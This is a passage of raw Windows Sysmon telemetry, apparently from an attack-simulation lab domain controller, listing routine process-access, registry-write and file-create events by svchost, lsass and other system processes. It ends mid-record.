13:53:05.399{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001014Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.399{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001013Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.399{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000001012Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.localT10532020-12-08 13:53:05.368{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeC:\Windows\Tasks\SA.DAT2016-09-12 11:34:03.403 13241300x80000000000000001011Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.352{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\srvnet\Parameters\MajorSequenceDWORD (0x00000191) 10341000x80000000000000001010Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1300-000000009101}1232C:\Windows\system32\dwm.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001009Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.336{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Winmgmt\Parameters\ServiceDllUnloadOnStopDWORD (0x00000001) 10341000x80000000000000001008Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001007Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001006Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001005Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001004Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001003Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.336{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x80000000000000001002Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.321{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{58c088e0-ee1e-48f3-9c7f-850e7f65ced4}\NetworkPerformsHijackingDWORD (0x00000000) 13241300x80000000000000001001Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.321{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{58c088e0-ee1e-48f3-9c7f-850e7f65ced4}\LastProbeTimeDWORD (0x5fcf8541) 13241300x80000000000000001000Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.321{10ACEC4A-8541-5FCF-1200-000000009101}1212C:\Windows\system32\svchost.exeHKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles\{58C088E0-EE1E-48F3-9C7F-850E7F65CED4}\DateLastConnectedBinary Data 13241300x8000000000000000999Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.321{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000998Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1700-000000009101}1832C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6a63|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000997Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000996Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+db992|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000995Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|c:\windows\system32\lsm.dll+1fc37|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000994Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-8541-5FCF-1000-000000009101}1156C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+1fb39|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000993Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000992Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-8540-5FCF-0C00-000000009101}596728C:\Windows\system32\svchost.exe{10ACEC4A-853E-5FCF-0B00-000000009101}864C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000991Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853E-5FCF-0A00-000000009101}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000990Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000989Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-853D-5FCF-0100-000000009101}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000988Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.305{10ACEC4A-853D-5FCF-0100-000000009101}4SystemHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 13241300x8000000000000000987Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-SetValue2020-12-08 13:53:05.305{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\EventLog\System\mrxsmb\ParameterMessageFile%%SystemRoot%%\System32\kernel32.dll 10341000x8000000000000000986Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000985Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:05.305{10ACEC4A-853E-5FCF-0B00-000000009101}864900C:\Windows\system32\lsass.exe{10ACEC4A-8541-5FCF-1500-000000009101}1364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000984Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 